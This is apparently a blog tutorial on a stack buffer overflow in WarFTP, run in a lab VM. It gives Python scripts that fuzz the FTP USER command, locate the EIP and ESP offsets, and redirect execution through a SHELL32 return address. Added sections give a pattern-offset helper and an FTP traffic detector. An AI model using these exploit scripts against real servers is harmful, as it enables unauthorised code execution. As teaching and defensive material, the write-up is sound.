Sunday, 05 February 2012

Buffer Overflow in WarFTP with Direct Return (Part 1)

First we install OllyDbg and WarFTP on Windows inside VirtualBox.
Then we write the Python script below by typing the command kwrite xfuzz.py, as in the screenshot:

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x41" * 1000      # 1000 'A' bytes sent as the USER argument
s.connect(('192.168.56.101', 21))
data = s.recv(1024)          # read the FTP banner

print("Sending evil data via USER command....")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()

print("Finish")
Open WarFTP and click the button with the lightning icon at the far left (screenshot).

Then run WarFTP inside OllyDbg and, on the attacker machine, run the command # python xfuzz.py. The end result is shown in the screenshot.


Then we move on to exploiting it. Change into the Metasploit tools directory with cd /pentest/exploits/framework/tools and run ./pattern_create.rb 1000 > string_pattern.txt to generate a 1000-byte unique pattern; then open the script again with kwrite xfuzz.py and send that pattern in place of the A's.

See for yourself later on the script, yes .... (^_^)

Then we run ./pattern_offset.rb 32714131 with the value that overwrote EIP, and the image appears with the offset (485, as used in the next script).
Next we run ./pattern_offset.rb q4Aq5Aq with the bytes ESP points to, which gives the offset where ESP lands inside the buffer (493 in the final script).
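To make the two pattern_offset.rb results above checkable offline, here is an added example (not from the original post, and not Metasploit's own code) that reimplements the Aa0Aa1Aa2... pattern behind pattern_create.rb and pattern_offset.rb in Python 3. It is the same computation a crash-triage engineer does to learn which bytes of an input reached the saved return address: a register value is converted to the little-endian byte order x86 stored it in, then located in the pattern. The function names and the triage_crash helper are my own.

```python
import string
import struct

# Full cycle of the pattern: every (upper, lower, digit) triple in order,
# "Aa0Aa1Aa2...Aa9Ab0...Zz9", 26*26*10*3 = 20280 bytes before it repeats.
_FULL_CYCLE = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
).encode()


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern (repeats past 20280)."""
    reps = length // len(_FULL_CYCLE) + 1
    return (_FULL_CYCLE * reps)[:length]


def pattern_offset(value, length=1000):
    """Offset of `value` inside pattern_create(length), or -1 if absent.

    `value` is either the raw bytes seen in memory (e.g. the bytes ESP points
    to) or a register value as an int; x86 is little-endian, so a register
    holding 0x32714131 was loaded from the bytes b"1Aq2".
    """
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern_create(length).find(value)


def triage_crash(eip, esp_bytes, length=1000):
    """Reproduce the post's two pattern_offset.rb runs in one call (helper name is mine).

    Returns (eip_offset, esp_offset, gap): how many input bytes precede the
    saved return address, where ESP lands in the input after the crash, and
    the number of bytes between the end of the overwritten EIP and ESP.
    """
    eip_off = pattern_offset(eip, length)
    esp_off = pattern_offset(esp_bytes, length)
    gap = esp_off - (eip_off + 4) if eip_off >= 0 and esp_off >= 0 else None
    return eip_off, esp_off, gap


if __name__ == "__main__":
    print(pattern_create(30).decode())            # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
    print(triage_crash(0x32714131, b"q4Aq5Aq"))   # (485, 493, 4)
```

Run as a script it reports (485, 493, 4): the 485 and 493 are the offsets the post plugs into its scripts, and the gap of 4 is exactly what the final script's padding line between the return address and offset 493 fills.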
Then we edit xfuzz.py again, and it looks as follows:
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
nilaiEIP = b"\x90" * 485              # 485 bytes of filler up to the saved EIP
nilaiEIP += b"\xEF\xBE\xAD\xDE"       # 0xDEADBEEF in little-endian: marker value to confirm EIP control
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("Sending evil data via USER command....")
s.send(b'USER ' + nilaiEIP + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")
Then the image appears (screenshot):
Continue editing xfuzz.py again; the result is:
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x90" * 485                     # filler up to the saved EIP
buffer += b"\x65\x82\xA5\x7C"              # 0x7CA58265 from SHELL32 (little-endian): the direct return address
buffer += b"\xCC" * (493 - len(buffer))    # pad to offset 493, where ESP points after the crash
buffer += b"\xCC" * (1000 - len(buffer))   # fill the rest with INT3 breakpoints so the debugger stops there
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                        # read the FTP banner
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
and the picture appears (screenshot):
Next, run OllyDbg, open the View menu and click Executable modules.
After that, look for SHELL32 in the list (the address used in the script above lies in this module).
Then we make a live call using telnet: open WarFTP and click the Online button on the left (screenshot).
Then we connect with telnet, as shown in the screenshot.
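Seen from the server side, all three scripts in this post share the same shape on the wire: a USER argument hundreds of bytes long, built from one repeated byte value, and (in the later versions) containing bytes outside printable ASCII. The following added example (not from the original post) is a small inspector for FTP client command lines that flags those three traits, run over constructed sample traffic that mirrors the post's payloads. The thresholds MAX_ARG_LEN and MIN_RUN_LEN are assumptions chosen for the example, not values from the post or from any IDS ruleset.

```python
import re

# Constructed thresholds (not from the post): RFC 959 sets no length limit on
# USER, but real user names are short, and a long run of one byte value is
# what a fill or NOP sled looks like on the wire.
MAX_ARG_LEN = 100
MIN_RUN_LEN = 32

# One FTP command line: a 3-4 letter verb, an optional argument, CRLF.
_FTP_CMD = re.compile(rb"\A([A-Za-z]{3,4})(?: (.*))?\r\n\Z", re.DOTALL)


def longest_run(data):
    """Length of the longest run of one repeated byte value in `data`."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def analyze_ftp_command(line, max_arg=MAX_ARG_LEN, min_run=MIN_RUN_LEN):
    """Return a list of findings for one client command line (empty = benign)."""
    m = _FTP_CMD.match(line)
    if m is None:
        return ["malformed command line"]
    verb = m.group(1).upper().decode()
    arg = m.group(2) or b""
    findings = []
    if len(arg) > max_arg:
        findings.append(f"{verb} argument is {len(arg)} bytes (limit {max_arg})")
    if any(b < 0x20 or b > 0x7E for b in arg):
        findings.append(f"{verb} argument contains non-printable bytes")
    run = longest_run(arg)
    if run >= min_run:
        findings.append(f"{verb} argument has a run of {run} identical bytes")
    return findings


def scan_session(lines):
    """Return [(index, findings)] for every suspicious line in a client stream."""
    flagged = []
    for i, line in enumerate(lines):
        findings = analyze_ftp_command(line)
        if findings:
            flagged.append((i, findings))
    return flagged


# Constructed sample client traffic: a normal login, then the two USER
# payload shapes from the post (1000 'A's; a NOP sled plus a marker for EIP).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"\x41" * 1000 + b"\r\n",
    b"USER " + b"\x90" * 485 + b"\xEF\xBE\xAD\xDE" + b"\r\n",
    b"PASS PASSWORD \r\n",
]

if __name__ == "__main__":
    for idx, findings in scan_session(SAMPLE_SESSION):
        print(idx, findings)
```

Only lines 2 and 3 of the sample are flagged: the first with two findings (length and a 1000-byte run of 'A'), the second with three (length, non-printable bytes, and the 485-byte NOP run). The same checks map directly onto the length-based FTP rules that network IDS products ship for this class of bug; the point of the example is that the traffic needs no signature for a specific address to stand out.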



